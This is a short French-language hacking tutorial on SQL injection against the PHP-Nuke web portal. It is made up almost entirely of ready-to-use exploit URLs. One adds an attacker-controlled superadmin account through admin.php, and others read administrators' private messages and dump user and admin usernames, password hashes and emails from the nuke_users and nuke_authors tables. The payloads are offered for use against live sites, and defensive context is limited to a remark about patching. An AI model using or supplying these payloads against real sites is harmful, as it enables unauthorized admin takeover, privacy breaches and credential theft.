Faille SQL Injection dans PHP NUKE!

 

Quesque PHP NUKE?
PHP NUKE est un portail en php trés facile d'accés nul besoin de si connaitre en programmation web...
Malheuresement ce portail permet de nombreuse injection SQL...

Comment faire une SQL injection?
Voici comment ce mettre amdin sur le site:

www.lesitephpnuke.com/admin.php?op=AddAuthor&add_aid=loadation_aos&add_name=God&add_pwd=jadore&add_email=tony@aos.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

Une fois l'injection faite allez vous indenfier dans www.lesitephpnuke.com/admin avec les identifiants suivant:

login: loadation_aos
mot de passe: jadore

Et voila si le webmaster ne s'est pas protéger(patch ou version + récente)vous aurez les droits d'admin...

Comment regarder les message personnel des admins:
www.lesitephpnuke.com/modules.php?name=Private_messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox

Comment uploader et modifier les download du site:
www.lesitephpnuke.com/modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1%200UNION%20SELECT%200,username,user_id,user_password,name,user_email,user_level,o,o%20FROM%20nuke_users

Commtn recuperer les mot de pass cryptés des admin :
www.lesitephpnuke.com/modules.php?name=Search&type=stories&query=f00bar&category=-1&categ=%20and%201=2%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/*

Il y a plein d'autre SQL injections mais à vous de les trouver, et bien sur, ces injections sont valable juste pour php !!